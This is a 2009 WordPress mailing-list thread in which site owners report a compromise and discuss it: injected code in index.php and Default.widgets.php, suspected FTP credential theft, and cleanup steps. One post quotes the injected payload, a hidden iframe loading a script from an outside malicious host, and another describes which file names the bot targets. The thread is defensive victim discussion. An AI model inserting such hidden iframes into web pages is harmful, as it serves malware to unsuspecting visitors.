you might be in trouble... On Thu, Jul 23, 2009 at 5:08 PM, Kirk M <[email protected]> wrote:
> Clean here so far (2.8.2). Guess I'll be working from Ubuntu to service my > sites for awhile rather than Windows at least until I get everything changed > around and my Windows parition fully scanned. I have several FTP accounts > configured, many are for other site owners who ask me to maintain their WP > powered sites. It definitely wouldn't do to have those get hacked. > > > On 07/23/2009 05:50 PM, Chris Carter wrote: > >> Change your pwds and scan away.. I used cpanel file manager for a while >> to >> make sure they stopped attacking .. looking at logs, it hits and is tagged >> with googlebot, but the IP's are strange >> >> Anyway, This virus looks for files with: >> >> index*.* >> default*.* >> main*.* >> home*.* >> >> (I built a static php includes site, and only files named like the above >> were affected) >> >> Also might want to check your CGI-BIN for files that look suspicious >> >> It's basically is a bot that logs in, finds any files in all directories >> that start with the above >> >> ...funny thing was that somtimes where they inject it, PHP code throws >> errors. They need to revise their bot to work outside the<? tags :) >> >> -Chris >> 314media.com >> >> On Thu, Jul 23, 2009 at 4:19 PM, Navjot Singh<[email protected] >> >wrote: >> >> Yeah..my Wordpress mu install also got hacked. Just confirmed. >>> >>> On Fri, Jul 24, 2009 at 2:48 AM, dinu<[email protected]> wrote: >>> >>>> I had to restore from backup. the entire blog >>>> when I first saw Default.widgets.php hacked, I tried restoring only that >>>> page. But then I found hidden iframe codes on all of my pages ( >>>> including >>>> pages after login ) >>>> >>>> when I contacted Dreamhost support, they said it was an ftp hack. So, I >>>> would think its not a wordpress issue. >>>> >>>> On Fri, Jul 24, 2009 at 2:35 AM, Navjot Singh<[email protected] >>>> wrote: >>>> >>>> 2.8.1 at the time of being hacked. Just upgraded to 2.8.2 >>>>> >>>>> On Fri, Jul 24, 2009 at 2:31 AM, Joshua >>>>> Dunbar<[email protected]> wrote: >>>>> >>>>>> What version of wordpress are you running? >>>>>> >>>>>> -------------------------------------------------- >>>>>> From: "Chris Carter"<[email protected]> >>>>>> Sent: Thursday, July 23, 2009 3:43 PM >>>>>> To:<[email protected]> >>>>>> Cc:<[email protected]>;< >>>>>> >>>>> [email protected]> >>> >>>> Subject: Re: [wp-testers] Default.widgets.php Hacked? What to do? >>>>>> >>>>>> I keep getting hacked with that code inserted into >>>>>>> >>>>>> admin/default-filters >>> >>>> >>>>>>> Chris Carter >>>>>>> President >>>>>>> 314media.com >>>>>>> 314-714-5448 >>>>>>> >>>>>>> On Jul 23, 2009, at 3:31 PM, Navjot Singh<[email protected]> >>>>>>> >>>>>> wrote: >>>>> >>>>>> >>>>>>> I have a blog running on 2.8.2 and suddenly now I find all index.php >>>>>>>> and wp-includes/Default.widgets.php hacked with following code >>>>>>>> inserted randomly : >>>>>>>> >>>>>>>> <iframe src="http://u1j.in:8080/ts/in.cgi?pepsi109"; width=125 >>>>>>>> height=125 style="visibility: hidden"></iframe> >>>>>>>> >>>>>>>> How to prevent further hacking? I am currently replacing all the >>>>>>>> >>>>>>> files >>> >>>> affected since all of them affected at a certain date. I am on a >>>>>>>> shared hosting and only one blog got attacked. >>>>>>>> >>>>>>>> Regards >>>>>>>> Navjot Singh >>>>>>>> _______________________________________________ >>>>>>>> wp-testers mailing list >>>>>>>> [email protected] >>>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>>>>>> >>>>>>> >>>>>>> _______________________________________________ >>>>>>> wp-testers mailing list >>>>>>> [email protected] >>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>>>>> >>>>>> >>>>>> _______________________________________________ >>>>>> wp-testers mailing list >>>>>> [email protected] >>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>>>> >>>>>> _______________________________________________ >>>>> wp-testers mailing list >>>>> [email protected] >>>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>>> >>>>> >>>> >>>> >>>> -- >>>> With Love >>>> Dinu >>>> >>>> http://chromestory.com >>>> http://offlineblog.net >>>> _______________________________________________ >>>> wp-testers mailing list >>>> [email protected] >>>> http://lists.automattic.com/mailman/listinfo/wp-testers >>>> >>>> _______________________________________________ >>> wp-testers mailing list >>> [email protected] >>> http://lists.automattic.com/mailman/listinfo/wp-testers >>> >>> _______________________________________________ >> wp-testers mailing list >> [email protected] >> http://lists.automattic.com/mailman/listinfo/wp-testers >> > _______________________________________________ > wp-testers mailing list > [email protected] > http://lists.automattic.com/mailman/listinfo/wp-testers > _______________________________________________ wp-testers mailing list [email protected] http://lists.automattic.com/mailman/listinfo/wp-testers
